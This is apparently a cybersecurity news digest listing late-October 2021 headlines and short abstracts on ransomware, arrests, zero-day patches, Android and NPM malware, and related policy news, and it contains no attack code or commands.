October, 2021
October 31, 2021 – General
Microsoft warns of rise in password sprays targeting cloud accounts
Abstract
The Microsoft Detection and Response Team (DART) says it detected an increase in password spray attacks targeting privileged cloud accounts and high-profile identities such as C-level executives. (BleepingComputer)
October 31, 2021 – Criminals
TA575 is Using Squid Game Lures to Drop Dridex
Abstract
Proofpoint stumbled across a cybercrime actor, TA575, sending thousands of Squid Game phishing lures aimed at multiple industries, primarily in the U.S. The group sends thousands of emails in every single campaign, aimed at hundreds of organizations. Users are advised not to believe anything on the... (Cyware Alerts - Hacker News)
October 31, 2021 – Breach
Iranian Black Shadow hacking group breached Israeli Internet hosting firm
Abstract
Iranian hacking group Black Shadow breached the Israeli internet hosting company Cyberserve, taking down several of its sites. Iranian hacking group Black Shadow compromised the server of the Israeli internet hosting company Cyberserve, taking... (Security Affairs)
October 31, 2021 – Malware
Rogue QR Codes Steal Microsoft Credentials and Crypto Funds
Abstract
Recently, researchers uncovered an email-based phishing scam containing QR codes in a bid to steal users' Microsoft credentials and other data. (Cyware Alerts - Hacker News)
October 31, 2021 – Attack
Minecraft Japanese gamers hit by Chaos ransomware using alt lists as lure
Abstract
Chaos ransomware operators target gamers' Windows devices using Minecraft alt lists as a lure, promoting them on gaming forums. Minecraft is one of the most popular games in the world; it had more than 140 million monthly active players in August... (Security Affairs)
October 31, 2021 – Attack
Graff multinational jeweller hit by Conti gang. Data of its rich clients are at risk, including Trump and Beckham
Abstract
The Conti ransomware gang hit high society jeweller Graff and threatens to release private details of world leaders, actors and tycoons. The latest attack of the Conti ransomware gang makes the headlines: the threat actors hit high society jeweller Graff... (Security Affairs)
October 31, 2021 – General
Security Affairs newsletter Round 338
Abstract
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. If you also want to receive the newsletter with the international press for free, subscribe here... (Security Affairs)
October 30, 2021 – Policy and Law
Police Arrest Suspected Ransomware Hackers Behind 1,800 Attacks Worldwide
Abstract
Twelve people have been detained as part of an international law enforcement operation for orchestrating ransomware attacks on critical infrastructure and large organizations that hit over 1,800 victims across 71 countries since 2019, marking the latest action against cybercrime groups. The arrests were made earlier this week, on October 26, in Ukraine and Switzerland, resulting in the seizure of cash worth $52,000, five luxury vehicles, and a number of electronic devices that the agencies said are being examined to uncover new forensic evidence of their malicious activities and pursue new investigative leads. The suspects have been primarily linked to LockerGoga, MegaCortex, and Dharma ransomware, in addition to being in charge of laundering the ransom payments by funneling the ill-gotten Bitcoin proceeds through mixing services and cashing them out. "The targeted suspects all had different roles in these professional, highly organised criminal organisations," Europol said... (The Hacker News)
October 30, 2021 – Ransomware
Chaos ransomware targets gamers via fake Minecraft alt lists
Abstract
The Chaos ransomware gang encrypts gamers' Windows devices through fake Minecraft alt lists promoted on gaming forums. (BleepingComputer)
October 30, 2021 – Attack
REvil and SolarMarker Employ SEO Poisoning Attacks
Abstract
Researchers highlight two separate campaigns dropping REvil and SolarMarker backdoors, leveraging SEO poisoning to spread payloads to the systems of targeted victims. (Cyware Alerts - Hacker News)
October 30, 2021 – Vulnerabilities
War-Driving - Still an Easy Bet for Household Wi-Fi Attacks
Abstract
A researcher from CyberArk demonstrated how a cheap device can be used to break into over 70% of Wi-Fi networks in one Tel Aviv community. According to the researchers, the sniffing technique used in the experiment only works with routers supporting roaming features. Users should use complex p... (Cyware Alerts - Hacker News)
October 30, 2021 – APT
Lazarus APT Group Enters the Supply Chain Attack Game
Abstract
Kaspersky revealed two separate supply chain attacks by the Lazarus Group aimed at an IT asset monitoring solution vendor, a South Korean think tank, and the defense industry. Hackers use a Racket downloader (signed with a stolen certificate) in the infection chain. Organizations must stay alert and... (Cyware Alerts - Hacker News)
October 30, 2021 – Breach
Hacker accessed medical info at UMass Memorial Health
Abstract
A cyber attack hit UMass Memorial Health; threat actors had access to the employee email system, potentially exposing patient info. Threat actors hacked into the employee email system of the UMass Memorial Health healthcare system, potentially accessing... (Security Affairs)
October 30, 2021 – Vulnerabilities
Chrome 95 Update Patches Exploited Zero-Days, Flaws Disclosed at Tianfu Cup
Abstract
A Chrome 95 update released by Google patches two actively exploited Chrome vulnerabilities, as well as flaws that were disclosed recently at Tianfu Cup, a Chinese hacking contest. (Security Week)
October 30, 2021 – General
Reading the INTERPOL African Cyberthreat Assessment Report 2021
Abstract
INTERPOL published the African Cyberthreat Assessment Report 2021, a report that analyzes the evolution of cybercrime in Africa. A new report published by INTERPOL, titled the African Cyberthreat Assessment Report 2021, sheds light on cybercrime... (Security Affairs)
October 30, 2021 – Attack
Ransomware Attack Hits PNG Finance Ministry
Abstract
Ransomware infiltrated and compromised a core server at the Department of Finance last week, hampering the government's access to foreign aid, its ability to pay cheques, and other basic functions in the midst of a spiraling Covid-19 surge. (Security Week)
October 30, 2021 – Government
MITRE and CISA publish the 2021 list of most common hardware weaknesses
Abstract
MITRE and CISA announced the release of the "2021 Common Weakness Enumeration (CWE) Most Important Hardware Weaknesses" list. MITRE and the DHS's Cybersecurity and Infrastructure Security Agency (CISA) have announced the release of the "2021... (Security Affairs)
October 30, 2021 – Policy and Law
Police sting targets suspects behind 1,800 attacks that 'wreaked havoc across the world'
Abstract
Twelve people have been targeted by an international law enforcement operation for involvement in over 1,800 ransomware attacks on critical infrastructure and large organizations around the world. (ZDNet)
October 30, 2021 – Botnet
TrickBot member extradited to US faces up to 60 years in prison
Abstract
An alleged member of the TrickBot gang, Russian national Vladimir Dunaev (aka FFX), has been extradited to the US. Vladimir Dunaev (38), a Russian national suspected of being a member of the infamous TrickBot gang, has been extradited to the U.S.... (Security Affairs)
October 30, 2021 – Vulnerabilities
Apple fixes security feature bypass in macOS
Abstract
Apple has delivered a barrage of updates for most of its devices this week, and among the vulnerabilities fixed are CVE-2021-30892, a System Integrity Protection bypass in macOS, and CVE-2021-30883, an iOS flaw that's actively exploited by attackers. (Help Net Security)
October 29, 2021 – Government
Federal push to identify, protect critical groups from hackers gains momentum
Abstract
Efforts in the federal government and Congress to identify and further protect groups critical to national security from cyber threats are gaining ground amid recent destructive ransomware attacks, officials say. (The Hill)
October 29, 2021 – Malware
This New Android Malware Can Gain Root Access to Your Smartphones
Abstract
An unidentified threat actor has been linked to a new Android malware strain that features the ability to root smartphones and take complete control over infected devices while simultaneously taking steps to evade detection. The malware has been named "AbstractEmu" owing to its use of code abstraction and anti-emulation checks undertaken to thwart analysis right from the moment the apps are opened. Notably, the global mobile campaign is engineered to target and infect as many devices as possible, indiscriminately. Lookout Threat Labs said it found a total of 19 Android applications that posed as utility apps and system tools like password managers, money managers, app launchers, and data saving apps, seven of which contained the rooting functionality. Only one of the rogue apps, called Lite Launcher, made its way to the official Google Play Store, attracting a total of 10,000 downloads before it was purged. The apps are said to have been prominently distributed via... (The Hacker News)
October 29, 2021 – General
The Week in Ransomware - October 29th 2021 - Making arrests
Abstract
This week, international law enforcement operations went on the offensive, making arrests in numerous countries for ransomware-related activities. (BleepingComputer)
October 29, 2021 – Vulnerabilities
New 'Shrootless' Bug Could Let Attackers Install Rootkit on macOS Systems
Abstract
Microsoft on Thursday disclosed details of a new vulnerability that could allow an attacker to bypass security restrictions in macOS and take complete control of the device to perform arbitrary operations without getting flagged by traditional security solutions. Dubbed "Shrootless" and tracked as CVE-2021-30892, the "vulnerability lies in how Apple-signed packages with post-install scripts are installed," Microsoft 365 Defender Research Team's Jonathan Bar Or said in a technical write-up. "A malicious actor could create a specially crafted file that would hijack the installation process." System Integrity Protection (SIP), aka "rootless", is a security feature introduced in OS X El Capitan that's designed to protect the macOS operating system by restricting a root user from executing unauthorized code or performing operations that may compromise system integrity. Specifically, SIP allows modification of prote... (The Hacker News)
October 29, 2021 – Malware
Snake malware biting hard on 50 apps for only $25
Abstract
Cybercriminals are flocking to use the Snake password-stealing trojan, making it one of the most popular malware families used in attacks. (BleepingComputer)
October 29, 2021 – General
Winter is Coming for CentOS 8
Abstract
Winter is Coming for CentOS 8—but here is how you can enjoy your holidays after all. The server environment is complex, and if you're managing thousands of Linux servers, the last thing you want is for an operating system vendor to do something completely unexpected. That is exactly what Red Hat, the parent company of the CentOS Project, did when it suddenly announced a curtailment of support for CentOS 8, sending thousands of organizations scrambling for an alternative. In this article, we'll review what happened with CentOS 8 and what it means for users who have already upgraded from CentOS release 7 to release 8. We'll also look at your alternatives for replacing CentOS 8. Finally, we'll review your other option: choosing extended support. Extended lifecycle support (ELS) can reduce the pressure to decide on an alternative distribution, and it may well be the most practical route for many CentOS 8 users. Official support is critical. The difficulties arou... (The Hacker News)
October 29, 2021 – Ransomware
Hive ransomware now encrypts Linux and FreeBSD systems
Abstract
The Hive ransomware gang now also encrypts Linux and FreeBSD systems, using new malware variants specifically developed to target these platforms. (BleepingComputer)
October 29, 2021 – Policy and Law
DOJ: Pirated sports streamer hacked accounts, extorted MLB
Abstract
The U.S. Attorney's Office for the Southern District of New York has charged a man with illegally streaming MLB, NBA, NFL, and NHL games via the web and hacking into sports leagues' customer accounts. (BleepingComputer)
October 29, 2021 – Solution
Microsoft: Windows web content filtering now generally available
Abstract
Microsoft has announced that web content filtering has reached general availability and is now available for all Windows enterprise customers. (BleepingComputer)
October 29, 2021 – Vulnerabilities
Google Chromebooks failing to enroll due to network issue
Abstract
Since Thursday evening, Google has been investigating reports of customers having issues enrolling their Chromebooks due to a network error. (BleepingComputer)
October 29, 2021 – Criminals
Police arrest hackers behind over 1,800 ransomware attacks
Abstract
Europol has announced the arrest of 12 individuals who are believed to be linked to ransomware attacks against 1,800 victims in 71 countries. (BleepingComputer)
October 29, 2021 – Ransomware
ESET found a variant of the Hive ransomware that encrypts Linux and FreeBSD
Abstract
The Hive ransomware operators have developed a new variant of their malware that can encrypt Linux and FreeBSD. ESET researchers discovered a new Hive ransomware variant that was specifically developed to encrypt Linux and FreeBSD. Researchers at the cybersecurity... (Security Affairs)
October 29, 2021 – Attack
Papua New Guinea's finance ministry was hit by ransomware
Abstract
A ransomware attack hit Papua New Guinea's finance ministry and disrupted government payments and operations. Government officials confirmed that Papua New Guinea's finance ministry was hit by a ransomware attack that disrupted government payments... (Security Affairs)
October 29, 2021 – Criminals
Russian TrickBot Gang Hacker Extradited to U.S. Charged with Cybercrime
Abstract
A Russian national, who was arrested in South Korea last month and extradited to the U.S. on October 20, appeared in a federal court in the state of Ohio on Thursday to face charges for his alleged role as a member of the infamous TrickBot group. Court documents showed that Vladimir Dunaev, 28, along with other members of the transnational cybercriminal organization, stole money and confidential information from unsuspecting victims, including individuals, financial institutions, school districts, utility companies, government entities, and private businesses. Starting out as a banking trojan in 2016, TrickBot has evolved into a modular, multi-stage Windows-based crimeware solution capable of pilfering valuable personal and financial information, and even dropping ransomware and post-exploitation toolkits on compromised devices. The malware is also notorious for its resilience, having survived at least two takedowns spearheaded by Microsoft and the U.S. Cyber Command... (The Hacker News)
October 29, 2021 – Vulnerabilities
Google fixes 2 new actively exploited zero-day flaws in Chrome
Abstract
Google has released Chrome 95.0.4638.69 for Windows, Mac, and Linux to address two actively exploited zero-day vulnerabilities. Google has released Chrome 95.0.4638.69 for Windows, Mac, and Linux to address two zero-day vulnerabilities, tracked as CVE-2021-38000... (Security Affairs)
October 28, 2021 – Vulnerabilities
Google Releases Urgent Chrome Update to Patch 2 Actively Exploited 0-Day Bugs
Abstract
Google on Thursday rolled out an emergency update for its Chrome web browser, including fixes for two zero-day vulnerabilities that it says are being actively exploited in the wild. Tracked as CVE-2021-38000 and CVE-2021-38003, the weaknesses relate to insufficient validation of untrusted input in a feature called Intents, as well as a case of inappropriate implementation in the V8 JavaScript and WebAssembly engine. The internet giant's Threat Analysis Group (TAG) has been credited with discovering and reporting the two flaws on September 15, 2021, and October 26, 2021, respectively. "Google is aware that exploits for CVE-2021-38000 and CVE-2021-38003 exist in the wild," the company noted in an advisory, without delving into technical specifics about how the two vulnerabilities were used in attacks or the threat actors that may have weaponized them. Also addressed as part of this stable channel update is a use-after-free vulnerability in the Web Transport component... (The Hacker News)
October 28, 2021 – Malware
TrickBot malware dev extradited to U.S. faces 60 years in prison
Abstract
A Russian national believed to be a member of the TrickBot malware development team has been extradited to the U.S. and is currently facing charges that could get him 60 years in prison. (BleepingComputer)
October 28, 2021 – Vulnerabilities
Emergency Google Chrome update fixes zero-days used in attacks
Abstract
Google has released Chrome 95.0.4638.69 for Windows, Mac, and Linux to fix two zero-day vulnerabilities that attackers have actively exploited. (BleepingComputer)
October 28, 2021 – Attack
UltimaSMS Victimizes Millions in Fraud Campaign
Abstract
A fraud campaign, dubbed UltimaSMS, is signing users up to premium SMS subscription services without their consent or knowledge. Promoted mostly via Instagram and TikTok, the campaign involves at least 151 malicious Android apps with over 10.5 million downloads in total. Stay cautious! (Cyware Alerts - Hacker News)
October 28, 2021 – Government
Senate approves bill to protect telecommunications infrastructure from foreign threats
Abstract
The Senate on Thursday unanimously passed legislation to take steps to further crack down on the use of telecommunications products from companies deemed to be a national security threat, such as those based in China. (The Hill)
October 28, 2021 – Hacker
Israeli Researcher Cracked Over 3500 Wi-Fi Networks in Tel Aviv City
Abstract
Over 70% of Wi-Fi networks from a sample size of 5,000 were hacked with "relative ease" in the Israeli city of Tel Aviv, highlighting how insecure Wi-Fi passwords can become a gateway for serious threats to individuals, small businesses, and enterprises alike. CyberArk security researcher Ido Hoorvitch, who used Wi-Fi sniffing equipment costing about $50 to collect 5,000 network hashes for the study, said "the process of sniffing Wi-Fis and the subsequent cracking procedures was a very accessible undertaking in terms of equipment, costs and execution." The new Wi-Fi attack builds on previous findings by Jens "atom" Steube in 2018 that involve capturing what's called the PMKIDs associated with a client (aka SSID) in order to attempt a brute-force attack using password recovery tools like hashcat. PMKID is a unique key identifier used by the access point (AP) to keep track of the pre-shared key — i.e., pairwise master key aka PMK — being u... (The Hacker News)
October 28, 2021 – Vulnerabilities
Microsoft found Shrootless bug in macOS that could bypass System Integrity Protection
Abstract
Microsoft finds a flaw in macOS, dubbed Shrootless (CVE-2021-30892), that can allow attackers to bypass System Integrity Protection (SIP). Microsoft discovered a vulnerability in macOS, dubbed Shrootless (CVE-2021-30892), that can allow attackers... (Security Affairs)
October 28, 2021 – Vulnerabilities
All Windows versions impacted by new LPE zero-day vulnerability
Abstract
A security researcher has disclosed technical details for a Windows zero-day privilege elevation vulnerability and a public proof-of-concept (PoC) exploit that gives SYSTEM privileges under certain conditions. (BleepingComputer)
October 28, 2021 – Vulnerabilities
Attackers Targeting a Zero-Day Bug in BillQuick Billing System
Abstract
Researchers have disclosed details about a now-patched critical vulnerability in a time and billing system called BillQuick that was being exploited by a new ransomware group. It can be triggered simply by using login requests with invalid characters in the username field. It's recommended to apply the... (Cyware Alerts - Hacker News)
October 28, 2021 – Hacker
Alleged Russian hacker extradited from South Korea to stand trial in US
Abstract
An alleged Russian hacker appeared in court for the first time Thursday to face allegations that he played a role in a transnational cybercrime organization, after being extradited to the United States from South Korea. (The Hill)
October 28, 2021 – Education
A Guide to Shift Away from Legacy Authentication Protocols in Microsoft 365
Abstract
Microsoft 365 (M365), formerly called Office 365 (O365), is Microsoft's cloud strategy flagship product, with major changes ahead, such as the deprecation of its legacy authentication protocols. Often stored on or saved to the device, Basic Authentication credentials are sent as usernames and passwords with every request, increasing the risk of attackers capturing users' credentials, particularly if not TLS protected. Basic Authentication, while necessary for companies using legacy software, is unable to enforce MFA and is superseded by Modern Authentication. The legacy settings have been on Microsoft's radar to fix for years. In 2018, Microsoft announced it would introduce a series of changes — and ultimately deprecation — to its authentication controls as a means to help organizations mitigate the risk. These changes were set to take place over a number of years, and in September 2021, Microsoft announced that it will begin to permanently disable Basic Auth in all... (The Hacker News)
October 28, 2021 – Vulnerabilities
Over 1 million WordPress sites affected by OptinMonster plugin flaws
Abstract
A vulnerability in the popular OptinMonster plugin allows unauthorized API access and sensitive information disclosure. A high-severity vulnerability (CVE-2021-39341) in the OptinMonster plugin can allow unauthorized API access and sensitive... (Security Affairs)
October 28, 2021 – Government
NSA and CISA share guidance on securing 5G cloud infrastructure
Abstract
CISA and the NSA shared guidance on securing cloud-native 5G networks from attacks seeking to compromise information or deny access by taking down cloud infrastructure. (BleepingComputer)
October 28, 2021 – Government
Beware of Ranzy Locker Ransomware: FBI Warns
Abstract
According to an FBI alert, Ranzy Locker ransomware operators crippled the networks of at least 30 U.S. organizations, mostly via brute-force attacks. The group runs a double extortion model, threatening to leak victims' data if they do not agree to the ransom demands. The alert by officials of... (Cyware Alerts - Hacker News)
October 28, 2021 – Government
Warner says cyber threats more worrying than 'traditional weaponry'
Abstract
Sen. Mark Warner (D-Va.) said Thursday that cyberattacks pose larger risks than conventional warfare, citing the recent SolarWinds and Colonial Pipeline hacks as examples of a "dramatically" different security environment that has taken shape over the past decade. (The Hill)
October 28, 2021 – Malware
New Wslink Malware Loader Runs as a Server and Executes Modules in Memory
Abstract
Cybersecurity researchers on Wednesday took the wraps off a "simple yet remarkable" malware loader for malicious Windows binaries targeting Central Europe, North America and the Middle East. Codenamed "Wslink" by ESET, this previously undocumented malware stands apart from the rest in that it runs as a server and executes received modules in memory. There are no specifics available on the initial compromise vector, and there are no code or operational overlaps that tie this tool to a known threat actor group. The Slovak cybersecurity firm noted that it has seen only a handful of detections in the past two years, suggesting that it could be used in highly targeted cyber infiltrations. Wslink is designed to run as a service and can accept encrypted portable executable (PE) files from a specific IP address, which are then decrypted and loaded into memory prior to execution. To achieve this, the client (i.e., the victim) and the server perform a handshake that in... (The Hacker News)
October 28, 2021 – Malware
Wslink, a previously undescribed loader for Windows binaries
Abstract
ESET researchers discovered a previously undescribed loader for Windows binaries, tracked as Wslink, that runs as a server and executes modules in memory. ESET researchers discovered Wslink, a previously undescribed loader for Windows binaries that,... (Security Affairs)
October 28, 2021 – Vulnerabilities
Microsoft: Shrootless bug lets hackers install macOS rootkits
Abstract
Attackers could use a new macOS vulnerability discovered by Microsoft to bypass System Integrity Protection (SIP) and perform arbitrary operations, elevate privileges to root, and install rootkits on vulnerable devices. (BleepingComputer)
October 28, 2021 – Business
Dragos Becomes First Industrial Cybersecurity Unicorn After Raising $200 Million
Abstract
The latest funding, which brings the total raised by Dragos to roughly $360 million, was led by Koch Disruptive Technologies and funds and accounts managed by BlackRock. Several other investors also took part in this round. (Security Week)
October 28, 2021 – Government
Biden administration officials outline steps to tackle urgent cyber threats
Abstract
Top Biden administration officials on Thursday outlined steps taken to confront the increase in cyber threats against the nation, including through strengthening key critical infrastructure groups. (The Hill)
October 28, 2021 – Malware
Malicious NPM Libraries Caught Installing Password Stealer and Ransomware
Abstract
Malicious actors have yet again published two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, with the goal of stealing credentials, installing remote access trojans, and infecting the compromised systems with ransomware. The bogus packages — named "noblox.js-proxy" and "noblox.js-proxies" — were found to impersonate a library called "noblox.js," a Roblox game API wrapper available on NPM that boasts nearly 20,000 weekly downloads; the poisoned libraries were downloaded a total of 281 and 106 times respectively. According to Sonatype researcher Juan Aguirre, who discovered the malicious NPM packages, the author of noblox.js-proxy first published a benign version that was later tampered with to add obfuscated text, in reality a Batch (.bat) script, to the post-installation JavaScript file. This Batch script, in turn, downloads malicious executables... (The Hacker News)
October 28, 2021 – Malware
AbstractEmu, a new Android malware with rooting capabilities
Abstract
AbstractEmu is a new Android malware that can root infected devices to take complete control and evade detection with different tricks. Security researchers at Lookout Threat Labs have discovered a new Android malware, dubbed AbstractEmu,... (Security Affairs)
October 28, 2021 – Privacy
Android spyware spreading as antivirus software in Japan
Abstract
A new variant of the Android info-stealer called FakeCop has been spotted by Japanese security researchers, who warn that the distribution of the malicious APK is picking up pace. (BleepingComputer)
October 28, 2021 – Education
Microsoft investing millions in community colleges to strengthen cyber workforce
Abstract
Microsoft on Thursday announced a new campaign to invest millions of dollars and resources in community colleges in an effort to address the massive shortage of American workers to fill cybersecurity positions. (The Hill)
October 28, 2021 – Cryptocurrency
German investigators identify crypto millionaire behind REvil operations
Abstract
German authorities have identified a Russian man named Nikolay K. who is suspected of being a prominent member of the REvil ransomware gang. The REvil ransomware gang is one of the most successful ransomware operations; the group and its affiliates have hit hundreds... (Security Affairs)
October 28, 2021 – Vulnerabilities
WordPress plugin bug impacts 1M sites, allows malicious redirects
Abstract
The OptinMonster plugin is affected by a high-severity flaw that allows unauthorized API access and sensitive information disclosure on roughly a million WordPress sites. (BleepingComputer)
October 28, 2021 – Breach
Crooks steal $130 million worth of cryptocurrency assets from Cream Finance
Abstract
Threat actors have stolen $130 million worth of cryptocurrency assets from the Cream Finance decentralized finance (DeFi) platform. C.R.E.A.M. Finance is a decentralized lending protocol for individuals, institutions and protocols to access financial... (Security Affairs)
October 28, 2021 – Malware
New AbstractEmu malware roots Android devices, evades detection
Abstract
New Android malware can root infected devices to take complete control and silently tweak system settings, as well as evade detection using code abstraction and anti-emulation checks. (BleepingComputer)
October 28, 2021 – Criminals
Ransomware gangs use SEO poisoning to infect visitors
Abstract
Researchers have spotted two campaigns, linked to either the REvil ransomware gang or the SolarMarker backdoor, that use SEO poisoning to serve payloads to targets. (BleepingComputer)
October 28, 2021 – Criminals
German investigators identify REvil ransomware gang core member
Abstract
German investigators have reportedly identified a Russian man named Nikolay K. whom they believe to be a core member of the REvil ransomware gang, one of the most notorious and successful ransomware groups in recent years. (BleepingComputer)
October 28, 2021 – Government
EU investigating leak of private key used to forge Covid passes
Abstract
The private key used to sign EU Digital Covid certificates has reportedly been leaked and is being circulated on messaging apps and forums. The key has also been misused to generate forged certificates, such as those for Adolf Hitler, Mickey Mouse and Sponge Bob—all of which are being recognized as valid by the official government apps. (BleepingComputer)
October 28, 2021 – Breach
Sensitive data of 400,000 German students exposed by API flaw
Abstract
Approximately 400,000 users of Scoolio, a student community app widely used in Germany, had sensitive information exposed due to an API flaw in the platform. (BleepingComputer)
October 27, 2021 – Vulnerabilities
WordPress Plugin Bug Lets Subscribers Wipe Sites
Abstract
The flaw, found in the Hashthemes Demo Importer plugin, allows any authenticated user to exsanguinate a vulnerable WordPress site, deleting nearly all database content and uploaded media. (Threatpost)
October 27, 2021 – Phishing
Teen Rakes in $2.74M Worth of Bitcoin in Phishing Scam
Abstract
The kid was busted after abusing Google Ads to lure users to his fake gift card site. (Threatpost)
October 27, 2021 – Vulnerabilities
Adobe's Surprise Security Bulletin Dominated by Critical Patches
Abstract
Out of 92 security vulnerabilities, 66 are rated critical in severity, mostly allowing code execution. The most severe can lead to information disclosure. (Threatpost)
October 27, 2021 – Criminals
NRA: No comment on Russian ransomware gang attack claims Full Text
Abstract
The Grief ransomware gang claims to have attacked the National Rifle Association (NRA) and released allegedly stolen data as proof of the attack.BleepingComputer
October 27, 2021 – General
Natural Disasters Can Set the Stage for Cyberattacks Full Text
Abstract
Cybercriminals, who are becoming increasingly sophisticated, could take advantage of natural disasters such as hurricanes, wildfires, and tornadoes to wreak havoc on critical infrastructure.Nextgov
October 27, 2021 – Attack
NRA hit by Russian-linked ransomware attack: reports Full Text
Abstract
The National Rifle Association (NRA) has been hit by a ransomware attack, becoming the latest victim of a massive spike in these attacks this year, according to multiple reports Wednesday.The Hill
October 27, 2021 – Malware
Hackers Using Squirrelwaffle Loader to Deploy Qakbot and Cobalt Strike Full Text
Abstract
A new spam email campaign has emerged as a conduit for a previously undocumented malware loader that enables the attackers to gain an initial foothold into enterprise networks and drop malicious payloads on compromised systems. "These infections are also used to facilitate the delivery of additional malware such as Qakbot and Cobalt Strike, two of the most common threats regularly observed targeting organizations around the world," said researchers with Cisco Talos in a technical write-up. The malspam campaign is believed to have commenced in mid-September 2021 via laced Microsoft Office documents that, when opened, trigger an infection chain that leads to the machines getting infected with a malware dubbed SQUIRRELWAFFLE . Mirroring a technique that's consistent with other phishing attacks of this kind, the latest operation leverages stolen email threads to give it a veil of legitimacy and trick unsuspecting users into opening the attachments. What's more, tThe Hacker News
October 27, 2021 – Ransomware
Avast releases free decrypters for AtomSilo and LockFile ransomware families Full Text
Abstract
Security firm Avast released today decryptors for AtomSilo and LockFile ransomware that allow victims to recover their files for free. Cyber security firm Avast has released today decryption utilities for AtomSilo and LockFile ransomware that allow...Security Affairs
October 27, 2021 – Education
Ransomware Attacks Are Evolving. Your Security Strategy Should, Too Full Text
Abstract
Defending against ransomware will take a move to zero-trust, argues Daniel Spicer, CSO, Ivanti.Threatpost
October 27, 2021 – Privacy
Android spyware apps target Israel in three-year-long campaign Full Text
Abstract
A set of seemingly innocuous Android apps have been infecting Israeli users with spyware since 2018, and the campaign continues to this day.BleepingComputer
October 27, 2021 – Hacker
TA551 Using Sliver Red-Teaming Tool to Penetrate Networks Full Text
Abstract
TA551 has been found targeting victims by email thread hijacking using a red-teaming toolkit and adversary simulation framework called Sliver. Experts revealed that the attackers have been using this technique since October 20. The use of open-source pentest tools is becoming more popular ... Read MoreCyware Alerts - Hacker News
October 27, 2021 – Government
Blinken formally announces new State Department cyber bureau Full Text
Abstract
Secretary of State Antony Blinken on Wednesday formally announced the establishment of a new cyber bureau at the State Department to help tackle cyber and emerging technology diplomatic issues.The Hill
October 27, 2021 – Education
[eBook] The Guide to Centralized Log Management for Lean IT Security Teams Full Text
Abstract
One of the side effects of today's cyber security landscape is the overwhelming volume of data security teams must aggregate and parse. Lean security teams don't have it any easier, and the problem is compounded if they must do it manually. Data and log management are essential for organizations to gain real-time transparency and visibility into security events. XDR provider Cynet has offered up a new guide ( read it here ) that helps lean organizations understand the importance of centralized log management (CLM). The truth is that even the most well-stocked and staffed teams would have trouble manually handling their log management needs, which is why organizations are increasingly going the automated route. On top of the efficiency of automation, CLM gives organizations much greater visibility into their environment and security events that impact them. However, the benefits of deploying CLM tools and reducing the level of human intervention in log management and analysis are mThe Hacker News
October 27, 2021 – Criminals
Grief ransomware gang hit US National Rifle Association (NRA) Full Text
Abstract
Grief ransomware operators claim to have compromised computer systems at US National Rifle Association (NRA) and added it to their leak site. Grief ransomware operators announced to have hacked US National Rifle Association (NRA) and threaten to leak...Security Affairs
October 27, 2021 – Vulnerabilities
War-Driving Technique Allows Wi-Fi Password-Cracking at Scale Full Text
Abstract
A researcher was able to crack 70 percent of the gathered hashes in an experiment in a residential neighborhood.Threatpost
October 27, 2021 – Ransomware
Free decryptor released for Atom Silo and LockFile ransomware Full Text
Abstract
Avast has just released a decryption tool that will help AtomSilo and LockFile ransomware victims recover some of their files for free, without having to pay a ransom.BleepingComputer
October 27, 2021 – Attack
Abuse of Discord CDN Witnesses Significant Rise Full Text
Abstract
A recent investigation conducted by RiskIQ revealed that threat actors abused the Discord channel to deliver a total of 27 unique malware families. This included backdoors, password stealers, spyware, and trojans.Cyware Alerts - Hacker News
October 27, 2021 – Government
Lawmakers split on next steps to secure transportation sectors against hackers Full Text
Abstract
Lawmakers are split on the next steps that should be taken to secure key transportation avenues like air and rail against cyber threats.The Hill
October 27, 2021 – Outage
Cyber Attack in Iran Reportedly Cripples Gas Stations Across the Country Full Text
Abstract
A cyber attack in Iran left petrol stations across the country crippled, disrupting fuel sales and defacing electronic billboards to display messages challenging the regime's ability to distribute gasoline. Posts and videos circulated on social media showed messages that said, "Khamenei! Where is our gas?" — a reference to the country's supreme leader Ayatollah Ali Khamenei. Other signs read, "Free gas in Jamaran gas station," with gas pumps showing the words "cyberattack 64411" when attempting to purchase fuel, semi-official Iranian Students' News Agency (ISNA) news agency reported . Abolhassan Firouzabadi, the head of Iran's Supreme Cyberspace Council, said the attacks were "probably" state-sponsored but added it was too early to determine which country carried out the intrusions. Although no country or group has so far claimed responsibility for the incident, the attacks mark the second time digital billboards haveThe Hacker News
October 27, 2021 – Ransomware
Avast released a free decryptor for Babuk ransomware Full Text
Abstract
Researchers from cybersecurity firm Avast released a decryption tool for Babuk ransomware that allows victims to recover their files for free. Cybersecurity firm Avast has released a decryption tool for Babuk ransomware that allows victims to recover...Security Affairs
October 27, 2021 – Vulnerabilities
Apple Patches Critical iOS Bugs; One Under Attack Full Text
Abstract
Researchers found that one critical flaw in question is exploitable from the browser, allowing watering-hole attacks.Threatpost
October 27, 2021 – Business
Twitter employees required to use security keys after 2020 hack Full Text
Abstract
Twitter rolled out security keys to its entire workforce and made two-factor authentication (2FA) mandatory for accessing internal systems following last year's hack.BleepingComputer
October 27, 2021 – General
Nearly all US execs have experienced a cybersecurity threat, but some say there’s still no plan Full Text
Abstract
A new survey by Deloitte suggests the majority of US executives have encountered a cybersecurity incident but this has not translated into the creation of incident response plans.ZDNet
October 27, 2021 – Attack
Latest Report Uncovers Supply Chain Attacks by North Korean Hackers Full Text
Abstract
Lazarus Group, the advanced persistent threat (APT) group attributed to the North Korean government, has been observed waging two separate supply chain attack campaigns as a means to gain a foothold into corporate networks and target a wide range of downstream entities. The latest intelligence-gathering operation involved the use of MATA malware framework as well as backdoors dubbed BLINDINGCAN and COPPERHEDGE to attack the defense industry, an IT asset monitoring solution vendor based in Latvia, and a think tank located in South Korea, according to a new Q3 2021 APT Trends report published by Kaspersky. In one instance, the supply-chain attack originated from an infection chain that stemmed from legitimate South Korean security software running a malicious payload, leading to the deployment of the BLINDINGCAN and COPPERHEDGE malware on the think tank's network in June 2021. The other attack on the Latvian company in May is an "atypical victim" for Lazarus, theThe Hacker News
October 27, 2021 – General
The 9th edition of the ENISA Threat Landscape (ETL) report is out! Full Text
Abstract
I'm proud to announce the release of the 9th edition of the ENISA Threat Landscape (ETL) on the state of the cybersecurity threat landscape. The European Agency for cybersecurity ENISA releases its ENISA Threat Landscape 2021 (ETL) report,...Security Affairs
October 27, 2021 – Criminals
Hackers arrested for ‘infiltrating’ Ukraine’s health database Full Text
Abstract
The Security Service of Ukraine (SSU) has arrested a team of actors who illegally infiltrated the information system of the National Health Service of Ukraine (NHSU) and entered false vaccination entries for other people.BleepingComputer
October 27, 2021 – Vulnerabilities
